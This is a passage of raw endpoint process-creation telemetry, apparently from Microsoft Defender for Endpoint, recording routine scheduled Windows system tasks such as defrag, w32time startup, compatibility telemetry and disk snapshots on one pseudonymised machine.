01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+70,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:53.172988800+00:00,20240,provtool.exe,ProvTool.exe /turn 5 /source LogonIdleTask,PortableExecutable,2021-03-11 01:06:21.750922900+00:00,C:\Windows\System32\provtool.exe,87040,380b6aa8de133a523f008e1c78ebada0,e0d2c66cc92a80c77ab29a56641505036130a8b01bcbafb866e28729f4985e4a,ead6ab9f677d771d426a17c58c95a5ca7e7d69fc,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:53.232351100+00:00,2021-06-23 01:03:43.135769500+00:00,f30796c8-884a-4a8a-b60b-91d4eaab0d5a,computerpii_0a470890c60768167990033d701e7bd881398861,156006,False,10.7740.19041.1052,False,11540474045136925,,11540474045172026,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,provtool,provtool,Provisioning package runtime processing tool
+71,False,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:53.181725300+00:00,2776,SpeechModelDownload.exe,SpeechModelDownload.exe,PortableExecutable,2021-06-09 01:20:44.420411100+00:00,C:\Windows\System32\Speech_OneCore\common\SpeechModelDownload.exe,182272,3c5dad72201e770a089ac64486f03d2b,dec41328d36106ba78dbbb59875fb3566091428c0deb98d381d8e08b26a1679d,6df800badccdba5b34d5273c2ecda6d694eaf4de,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:53.233843+00:00,2021-06-23 01:03:43.135854100+00:00,0449afc2-4f51-48b2-ad7a-c0262689f81e,computerpii_0a470890c60768167990033d701e7bd881398861,156007,False,10.7740.19041.1052,False,11540474045136925,,11540474045172027,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,Speech Model Download Executable,SpeechModelDownload.exe,Speech Model Download Executable
+72,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:53.668908+00:00,4312,Defrag.exe,"""defrag.exe"" -p c78 -s 0000000000000590 -b -OnlyPreferred C:",PortableExecutable,2021-02-17 04:35:36.620080800+00:00,C:\Windows\System32\Defrag.exe,210432,e2601e315e9a9837279a23963f5819b0,7a18dbbe6ca138389424a7b2c0135ba4a7541c33e0443227f3cf505b58b52a85,5bb7fdaf33e556323a1152d36b0f9159cc53d291,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.104087500+00:00,3192,svchost.exe,svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:53.744582400+00:00,2021-06-23 01:03:43.136457700+00:00,a7b72431-ecd3-474b-a2db-03306c8f880a,computerpii_0a470890c60768167990033d701e7bd881398861,156014,False,10.7740.19041.1052,False,11540474045136957,,11540474045172030,2021-06-10 00:46:11.104087500+00:00,3192,2021-06-10 00:46:11.104087500+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3192,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corp.,Windows Drive Optimizer,10.0.19041.746,Defrag.EXE,Defrag.EXE,Disk Defragmenter Module
+73,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:53.673648400+00:00,9572,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,e2601e315e9a9837279a23963f5819b0,7a18dbbe6ca138389424a7b2c0135ba4a7541c33e0443227f3cf505b58b52a85,5bb7fdaf33e556323a1152d36b0f9159cc53d291,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:53.668908+00:00,4312,Defrag.exe,"""defrag.exe"" -p c78 -s 0000000000000590 -b -OnlyPreferred C:",True,2021-06-10 00:46:11.104087500+00:00,3192,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:53.744772400+00:00,2021-06-23 01:03:43.136543500+00:00,6ec81392-3b24-45f0-b829-f380e47237e3,computerpii_0a470890c60768167990033d701e7bd881398861,156015,False,10.7740.19041.1052,False,11540474045172030,,11540474045172031,2021-06-23 01:00:53.668908+00:00,4312,2021-06-23 01:00:53.668908+00:00,Defrag.exe,4312,18688,TerminateProcessStartkey,C:\Windows\System32,210432,2034-09-24 09:30:42+00:00,2021-02-17 04:35:36.622740100+00:00,2021-06-23 01:00:53.681616700+00:00,2021-02-17 04:35:36.620080800+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corp.,Windows Drive Optimizer,10.0.19041.746,Defrag.EXE,Defrag.EXE,Disk Defragmenter Module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+74,False,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.382648+00:00,19636,sc.exe,sc.exe start w32time task_started,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\sc.exe,72192,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.415732300+00:00,2021-06-23 01:03:43.136708400+00:00,208baa38-1bea-4233-ad9e-3f7d14979b37,computerpii_0a470890c60768167990033d701e7bd881398861,156017,False,10.7740.19041.1052,False,11540474045136925,,11540474045172037,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool
+75,False,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.390973500+00:00,4684,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:00:55.382648+00:00,19636,sc.exe,sc.exe start w32time task_started,False,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.417026300+00:00,2021-06-23 01:03:43.136795900+00:00,d4aa45c6-7d1d-43b9-a857-c6dab8ce06b2,computerpii_0a470890c60768167990033d701e7bd881398861,156018,False,10.7740.19041.1052,False,11540474045172037,,11540474045172039,2021-06-23 01:00:55.382648+00:00,19636,2021-06-23 01:00:55.382648+00:00,\Device\HarddiskVolume3\Windows\System32\sc.exe,19636,128,ActiveProcessStartkey,C:\Windows\System32,72192,2064-01-25 04:43:49+00:00,2019-12-07 09:09:34.006180900+00:00,2021-06-23 01:00:55.385306+00:00,2019-12-07 09:09:34.006180900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+76,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:55.389779400+00:00,16632,rundll32.exe,"rundll32.exe Startupscan.dll,SusRunTask",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.417213400+00:00,2021-06-23 01:03:43.136882100+00:00,99ddc4a8-5c6f-4ac2-94f9-51fff7f003ed,computerpii_0a470890c60768167990033d701e7bd881398861,156019,False,10.7740.19041.1052,False,11540474045136925,,11540474045172038,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102296,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+77,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.397032900+00:00,12924,rundll32.exe,"rundll32.exe C:\Windows\system32\Windows.StateRepositoryClient.dll,StateRepositoryDoMaintenanceTasks",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.433586800+00:00,2021-06-23 01:03:43.137055500+00:00,f71957b2-99b6-4fa5-a410-56eefccddc7f,computerpii_0a470890c60768167990033d701e7bd881398861,156021,False,10.7740.19041.1052,False,11540474045136925,,11540474045172040,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+78,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.404476+00:00,10864,CompatTelRunner.exe,compattelrunner.exe -maintenance,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.437022200+00:00,2021-06-23 01:03:43.137140500+00:00,40582ba5-e287-4454-9fb4-07a2baa0c328,computerpii_0a470890c60768167990033d701e7bd881398861,156022,False,10.7740.19041.1052,False,11540474045136925,,11540474045172041,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+79,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.411584100+00:00,1452,dmclient.exe,dmclient.exe,PortableExecutable,2021-02-17 04:34:43.547067+00:00,C:\Windows\System32\dmclient.exe,121344,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.440246500+00:00,2021-06-23 01:03:43.137226300+00:00,48495451-1da0-4cb6-bbfa-4b24dd62721e,computerpii_0a470890c60768167990033d701e7bd881398861,156023,False,10.7740.19041.1052,False,11540474045136925,,11540474045172042,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client
+80,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.414180200+00:00,1476,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.404476+00:00,10864,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.440625300+00:00,2021-06-23 01:03:43.137312700+00:00,f5e011d1-5392-4a05-aee7-af8f5bb8120b,computerpii_0a470890c60768167990033d701e7bd881398861,156024,False,10.7740.19041.1052,False,11540474045172041,,11540474045172043,2021-06-23 01:00:55.404476+00:00,10864,2021-06-23 01:00:55.404476+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,10864,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 00:53:42.004793900+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+81,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:55.427832+00:00,18536,AppHostRegistrationVerifier.exe,AppHostRegistrationVerifier.exe,PortableExecutable,2021-02-17 04:34:48.145514500+00:00,C:\Windows\System32\AppHostRegistrationVerifier.exe,120320,9709fb202693dbec05127519ee4b65a9,69c0d08149aee10f9a6ee68d19143e2ce80047ab9e07fbda5b2bf964e06a03ce,40fc8c8639937e3501b63f1bb4b8b094a16f46d2,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.444739700+00:00,2021-06-23 01:03:43.137400800+00:00,6a7bdf6e-f3dc-4573-a37d-18b274ad9179,computerpii_0a470890c60768167990033d701e7bd881398861,156025,False,10.7740.19041.1052,False,11540474045136925,,11540474045172045,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102296,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,App Uri Handlers Registration Verifier,AppHostNameRegistrationVerifier.exe,App Uri Handlers Registration Verifier
+82,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.446430600+00:00,11208,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:00:55.411584100+00:00,1452,dmclient.exe,dmclient.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.464106600+00:00,2021-06-23 01:03:43.137486600+00:00,0227f472-1f4b-4110-87af-05cd5cd12684,computerpii_0a470890c60768167990033d701e7bd881398861,156026,False,10.7740.19041.1052,False,11540474045172042,,11540474045172047,2021-06-23 01:00:55.411584100+00:00,1452,2021-06-23 01:00:55.411584100+00:00,\Device\HarddiskVolume3\Windows\System32\dmclient.exe,1452,128,ActiveProcessStartkey,C:\Windows\System32,121344,2083-12-25 18:01:52+00:00,2021-02-17 04:34:43.549079100+00:00,2021-06-23 01:00:55.400928200+00:00,2021-02-17 04:34:43.547067+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+83,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:00:55.446512700+00:00,15664,DiskSnapshot.exe,disksnapshot.exe -z,PortableExecutable,2019-12-07 09:08:37.284740+00:00,C:\Windows\System32\DiskSnapshot.exe,84480,fd450157fcc92c0a80ec3cf22ab5e4b3,2af7212a150b721d0105928864df0049a4d959ad7b5b997df47ba69b434404b3,394166fe3140a310371df5d58e95c0ad86706876,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:55.467693300+00:00,2021-06-23 